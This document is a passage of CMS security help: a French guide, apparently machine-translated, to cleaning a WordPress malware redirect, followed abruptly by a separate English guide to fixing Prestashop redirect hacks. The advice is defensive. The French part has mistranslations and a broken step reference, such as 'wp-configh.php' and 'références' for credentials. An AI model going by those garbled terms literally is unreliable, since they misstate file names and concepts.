Le moyen le plus sûr de nettoyer ce fichier est de noter les détails de connexion à la base de données WordPress (nom de la base de données, nom d’utilisateur, mot de passe et préfixe de table, de supprimer le fichier wp-config.php en direct et d’utiliser le fichier wp-config.php par défaut (qui se trouve sous le nom de wp-config-sample.php) et d’insérer les détails de la base de données en direct.

  1. Modifier les clés d’authentification de votre fichier wp-configh.php
    Une fois que vous avez restauré le fichier wp-config.php par défaut, remplacez les clés d’authentification en en générant de nouvelles.
  2. Mettez à jour votre installation WordPress
    Les logiciels malveillants se répandent généralement dans les fichiers de base de votre site WordPress, aussi, pour faire suite à l’étape 2, nous vous suggérons de mettre également à jour votre WordPress. Il existe une option pour cet emploi dans votre page de mise à jour du tableau de bord WordPress.
  3. Vérifiez la présence de logiciels malveillants dans votre répertoire de médias
    Parcourez votre répertoire wp-content/uploads à l’aide d’un client FTP ou du gestionnaire de fichiers de votre panneau d’hébergement et recherchez les fichiers .php, .js et .ico dans vos répertoires média. Vos répertoires de médias ne doivent contenir que des fichiers statiques comme des images et des pdf.
  4. Suivez la même procédure pour tous les autres sites WordPress
    Si vous hébergez d’autres sites WordPress sous le même compte d’hébergement, ils peuvent également être infectés. Dans ce cas, vous devez les nettoyer toutes sans poser de questions, sinon le reste du site WordPress ré-infectera les sites récemment nettoyés.

Il est tout aussi important de nettoyer votre site WordPress de la redirection des logiciels malveillants que de trouver les raisons pour lesquelles votre site a été infecté au départ. De cette façon, vous éviterez que le piratage ne se reproduise. Lorsque vous apprenez comment votre site a été piraté, vous avez une longueur d’avance sur le pirate. Vous pouvez localiser les fichiers contenant des codes malveillants et supprimer toute porte dérobée ayant accordé au pirate des privilèges d’administrateur. Il vous aidera également à acquérir une certaine expérience en matière de nettoyage de sites WordPress piratés, ce qui vous permettra de mieux sécuriser de manière proactive vos autres sites WordPress

  1. Logiciels obsolètes
    Les logiciels obsolètes (noyau, thèmes et plugins WordPress) sont la principale cause de vulnérabilité. Les pirates connaissent généralement les faiblesses dès le départ car les vulnérabilités de sécurité sont parfois notées dans les journaux des modifications.
  2. Vulnérabilités des plugins
    Parfois, même les dernières mises à jour peuvent contenir des bogues – prenez 5 minutes pour lire un problème qui s’est produit avec un exploit 0-Day dans l’une des versions du plugin Easy WP SMTP.
  3. Des références prévisibles
    L’utilisation d’identifiants prévisibles (je vous regarde, utilisateur “admin” !) facilite grandement le succès des attaques par force brute. Si quelqu’un obtient l’accès à l’administration soit en détournant votre utilisateur actuel ou en créant un administrateur fantôme par le biais d’une vulnérabilité, vous avez officiellement perdu le contrôle de votre site.
  4. Utilisation des thèmes et plugins annulés
    Permettez-moi de dire que je comprends parfaitement la tentation. Vous pensez peut-être que vous pouvez économiser 50 à 60 dollars sur ce thème, sans parler de ces extensions WooCommerce très coûteuses qui peuvent atteindre 249 dollars. Chaque année. Vous pensez peut-être aussi que vous pouvez réorienter cet argent et l’utiliser pour le marketing. N’est-ce pas ? Faux.

Rien dans ce monde n’est gratuit. Les thèmes nuls ne sont pas une exception. Ils seront livrés avec des logiciels publicitaires, des logiciels contre rançon ou tout autre type de logiciel. Lorsque cela commencera à ramper sur votre site, l’argent que vous aurez économisé sera de la petite monnaie par rapport à ce que vous allez dépenser pour nettoyer votre site et réparer les dégâts (qui peuvent être totaux).

Comment protéger votre site WordPress contre un nouveau piratage


Avant de faire des suggestions, je vais être tout à fait honnête. Quoi que vous fassiez et quel que soit votre dévouement pour sécuriser votre site, il y a toujours une possibilité que quelqu’un réussisse à le pirater. Si cela vous donne envie de nous crier dessus dans la section des commentaires, je comprends tout à fait, mais permettez-moi de m’étendre.

Votre travail consiste à ne pas faciliter le piratage de votre site par quiconque. La possibilité sera toujours là, mais la rapidité avec laquelle vous la saisissez et la rapidité de votre réaction peuvent faire une grande différence. Si vous disposez d’une sécurité adéquate, il y a de fortes chances que votre site ne subisse aucun dommage grave et que vous puissiez tout ramener à la normale en un rien de temps.

Dans cet esprit, voici la liste des choses que vous souhaitez faire pour assurer la sécurité de votre site :

  • Protéger la page de connexion
  • Sécurisez vos dossiers et votre base de données
  • Mettez à jour vos thèmes, plugins et fichiers de base WordPress
  • Appliquer des restrictions pour les bots, certains PA et pays
  • Surveillez votre site

Vous trouverez ici un article de fond sur la manière de protéger votre site WordPress contre le piratage.

Il est également conseillé de s’abonner à un service de sécurité WordPress. Cela vous permettra de surveiller constamment le site et de réagir rapidement en cas de problème. Il s’ajoute aux dépenses mensuelles et peut ne pas convenir à tous les budgets, mais cela dépend surtout de ce que votre site représente pour vous et de ce que vous êtes prêt à dépenser pour le sécuriser.

How to fix Prestashop Hacked Redirect

Prestashop redirect hack

Prestashop is widely used for e-commerce over the internet. Being so popular, Prestashop is also frequently targeted by hackers. As a result, the customers may face issues like Prestashop hacked redirect wherein the users are redirected to malicious sites. Some other consequences include being blacklisted by search engines, malicious adverts, etc. Often users infected with Prestashop hacked redirect or any other hack resort to forums for help. This is because there is a lack of information on how to get rid of these PrestaShop hacks. The ones that are available are not very reliable, so to say. In such an event, forums seem like the only good resource there is. For example, see the pictures below:

Type caption (optional)
Type caption (optional)

Today, with this article, we aim to provide a one-stop knowledge resource to Prestashop redirect hack. We will discuss in detail its symptoms, common hack areas and remediation steps.

Symptoms of a PrestaShop Redirect Hack

Some common symptoms of a Prestashop hacked redirect are:

  • Malicious pop-ups appear on the site which redirects users to spammy domains.
  • The site becomes slow and unresponsive.
  • There is a sudden spike in the site bounce rate.
  • Search engines like Google blacklist your website.
  • The hosting provider may suspend your account.
  • Adblockers are blocking your website.

Some files are commonly targeted by attackers during a Prestashop hacked redirect. These are:

  • Index.php.
  • Config.php.
  • .htaccess file.
  • Functions.php.
  • Buggy template files.
  • Footer and Header of theme files.

How to fix PrestaShop Hacked Redirect

Step 1: Prerequisites

The first step would be to take a backup of the Prestahop store in case something breaks while removing malware. To do so, follow this article in the official documentation. Also, in case you use a hosting service, you can request them for a backup of your site.The next thing would be to put your Prestashop store in maintenance mode. Doing so will prevent customers from placing orders on your store while you are working to remove the malware. To do so:

  1. Login to your Prestashop Dashboard.
  2. For Prestashop 1.7, navigate to Shop Parameters>Mainetnance.
  3. Now here, change enable shop to No and click on Save.
Type caption (optional)

Step 2: Detection

Now try to locate the source of Prestashop hacked redirect infection. In case the site has been blacklisted by Google, the security tab can help in finding the source of infection. You can use online malware scanners to search for infected files like the one here. If you are still unable to trace the source of Prestashop hacked redirect infection, look for any suspicious files or any new administrator accounts. Also, search for suspicious links in the source code of the files.

Step 3: Cleanup

If one of your core files is infected, replace it from the official repository of Prestashop. For database infection, try dropping the infected tables or if you already have a backup then restore it from there. Delete suspicious files that are not part of core Prestashop. Remove any suspicious plugins, themes, etc. Moreover, change all the passwords (Dashboard, FTP, etc.).Finally, when the infection is resolved make sure to turn off the maintenance mode. Sometimes the infection may reappear after cleaning. Or you are unable to spot the infection in the first place.

PrestaShop Security Measures

  • Make sure the password to the Prestashop dashboard is a secure and random one. If possible, use an addon that provides two-factor authentication while logging in.
  • Ensure that the permissions for folders are set to 755 in Prestashop and 644 for files.
  • Avoid using null themes or modules. They may come free but are often injected with malware which can cause Prestashop hacked redirect issues. Also, avoid using the ones which are not reputed as they may contain security bugs.
  • Use a security solution or firewall of some sort.
  • Keep your Prestashop store up to date as updates contain important security improvements that can be verified using the changelogs.
  • Use CAPTCHA modules to prevent spam on the Prestashop store.
  • In case you suspect that your website is injected with Prestashop hacked redirect, scan it online and determine the cause.
  • If your Prestashop store is hosted on Apache server, use .htaccess to block access to sensitive directories. To do so create a .htaccess file in them and add the following code to it:
Order Deny,Allow
Deny from all
Allow from 22.33.44.55

Conclusion

As evident from the article, there are multiple ways in which the Prestashop hacked redirect can occur. For an average user of Prestashop, it may be next to impossible to prevent it in any manner. Although covering the basics mentioned in this article can provide you some security, nevertheless the redirect hack can still occur. To prevent such a scenario, a security audit and penetration testing of your Prestashop website are important. The security audit will try to uncover loopholes while the penetration test will try to exploit them. This would emulate a real-world scenario where the hacker would try all this. Doing so will help you find the security issues with your Prestashop store and patch them.